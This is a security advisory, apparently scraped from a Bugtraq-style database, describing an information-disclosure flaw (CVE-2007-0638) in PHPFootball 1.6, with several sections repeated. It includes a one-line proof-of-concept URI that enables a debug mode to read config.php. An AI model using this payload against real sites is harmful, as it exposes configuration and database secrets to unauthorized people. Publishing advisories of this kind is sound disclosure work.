PHPFootball Show.PHP Information Disclosure Vulnerability
BID:22312
Info
PHPFootball Show.PHP Information Disclosure Vulnerability
| Bugtraq ID: | 22312 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-0638 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 30 2007 12:00AM |
| Updated: | May 12 2015 07:34PM |
| Credit: | ajann is credited with the discovery of this vulnerability. |
| Vulnerable: |
PHPFootball PHPFootball 1.6 |
| Not Vulnerable: | |
Discussion
PHPFootball Show.PHP Information Disclosure Vulnerability
PHPFootball is prone to an information-disclosure vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to view any database information that the application has read access to. Information obtained may aid in further attacks.
Version 1.6 is vulnerable; other versions may also be affected.
PHPFootball is prone to an information-disclosure vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to view any database information that the application has read access to. Information obtained may aid in further attacks.
Version 1.6 is vulnerable; other versions may also be affected.
Exploit / POC
PHPFootball Show.PHP Information Disclosure Vulnerability
Attackers can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://www.example.com/include/debug.php?config[debug]=10&conffile=config.php
Attackers can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://www.example.com/include/debug.php?config[debug]=10&conffile=config.php
Solution / Fix
PHPFootball Show.PHP Information Disclosure Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].